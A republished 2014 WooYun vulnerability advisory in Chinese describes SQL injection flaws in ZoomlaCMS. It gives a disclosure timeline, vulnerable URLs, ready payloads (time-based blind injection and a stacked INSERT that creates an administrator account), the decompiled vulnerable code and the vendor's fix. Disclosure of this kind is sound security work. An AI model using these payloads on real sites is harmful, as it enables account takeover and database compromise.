[公开漏洞]逐浪CMS某设计缺陷允许盲注(可直接任意加入管理员)

逐浪CMS某设计缺陷允许盲注(可直接任意加入管理员) 相关厂商： 逐浪CMS 漏洞作者：abcdlzy 提交时间：2014-04-18 17:08 公开时间：2014-07-17 17:09 漏洞类型：SQL注射漏洞 危害等级：高 自评Rank：20 漏洞状态： 厂商已经确认 漏洞来源：http://www.wooyun.org Tags标签： SQL注射 漏洞详情 披露状态：

2014-04-18：细节已通知厂商并且等待厂商处理中
2014-04-19：厂商已经确认，细节仅向厂商公开
2014-04-22：细节向第三方安全合作伙伴开放
2014-04-29：细节向核心白帽子及相关领域专家公开
2014-05-09：细节向普通白帽子公开
2014-05-29：细节向实习白帽子公开
2014-07-17：细节向公众公开

简要描述：

RT

详细说明：

虽然说故障页面还是有部分和WooYun-2014-56963相同，但是那个仅仅是提取普通会员权限，最后经过反编译，然后白盒审计，发现多处可以盲注，直接加入管理员



页面1：

http://demo.zoomla.cn/user/AppBack.aspx?type=QQ&openID=

依然是这个页面逻辑判断有问题。

页面2：

http://demo.zoomla.cn/user/UpdateMailChk.aspx?username=1&mail=1

漏洞证明：

页面1：

可以在用户名中输入

this1','this1','','','',1);waitfor/**/delay/**/'0:00:10'--

然后该怎么搞就怎么搞了

强行加入管理员表方法：

用户名中输入以下数据：

this1%27%2C%27this1%27%2C%27%27%2C%27%27%2C%27%27%2C1%29%3BINSERT/**/INTO/**/[dbo].[ZL_Manager] ([AdminName],[AdminPassword],[UserName],[EnableMultiLogin],[IsLock],[AdminRole],[AdminType],[AdminTrueName],[AddUserID])/**/VALUES/**/('wooyuntest2','202cb962ac59075b964b07152d234b70','wooyuntest2',1,0,'1',1,'wooyuntest2','1')--

zoomeye随便抓了个站来试的：

页面2：

http://demo.zoomla.cn/user/UpdateMailChk.aspx?username=1&mail=2' where UserName='1';waitfor delay '0:00:03'--

上面UserName需要匹配自己当前登陆的用户

这个页面需要登陆后才能用

修复方案：

我们来白盒审计下代码。

漏洞1：

在appback.aspx中，点击提交的话会调用这个函数

protected void Register_Click(object sender, EventArgs e)

然后发现了这么个喜闻乐见的代码

string str = this.Username.Text.Trim();

this.info.UserName = str;

int num = this.buser.InsertUser(this.info, muinfo);

好的，我们继续进入InsertUser这个函数看

public int InsertUser(M_UserInfo userInfo, M_Uinfo muinfo)

{

          string commandText = " insert into ZL_User(UserName,UserPwd,email,Question,answer,GroupID) values('" + userInfo.UserName + "','" + userInfo.UserPwd + "','','','',1);select @@IDENTITY";

          int num = SqlHelper.ObjectToInt32(SqlHelper.ExecuteScalar(CommandType.Text, commandText));

          string str2 = "";

          if (muinfo.UserSex)

          {

                    str2 = "1";

          }

          else

          {

                    str2 = "0";

          }

          SqlHelper.ExecuteSql(string.Concat(new object[] { "insert into ZL_UserBase(birthday,userid,usersex)values('", muinfo.BirthDay, "',", num, ",", str2, ")" }));

          return num;

}

看到这个commandText 大家都懂了。



漏洞2：

if (!string.IsNullOrEmpty(base.Request["mail"]) && !string.IsNullOrEmpty(base.Request.QueryString["UserName"]))

                    {

                              if (this.buser.GetLogin().UserName == base.Request.QueryString["UserName"])

                              {

                                        this.buser.UpByWhere("ZL_User", "Email='" + base.Request["mail"] + "'", "UserName='" + base.Request.QueryString["UserName"] + "'");

mail参数用户可控，同时结合 UpByWhere函数：

public bool UpByWhere(string tableName, string set, string where)

{

          return ((((tableName.Length > 0) && (set.Length > 0)) && (where.Length > 0)) && SqlHelper.ExecuteSql("UPDATE " + tableName + " SET " + set + " WHERE " + where));

}

又可以构造出一个盲注点



敢不敢用参数化查询。全部都是拼接的，根本不安全。

版权声明：转载请注明来源 abcdlzy@乌云

漏洞回应 厂商回应：

危害等级：中

漏洞Rank：5

确认时间：2014-04-19 01:07

厂商回复：

代码审查不严，很抱歉，已紧急处理好。

最新状态：

2014-04-19：已更新。

0

版权与免责声明：

凡注明稿件来源的内容均为转载稿或由网友用户注册发布，本网转载出于传递更多信息的目的；如转载稿涉及版权问题，请作者联系我们，同时对于用户评论等信息，本网并不意味着赞同其观点或证实其内容的真实性；

本文地址：https://top.cnzzla.com/artinfo/2516.html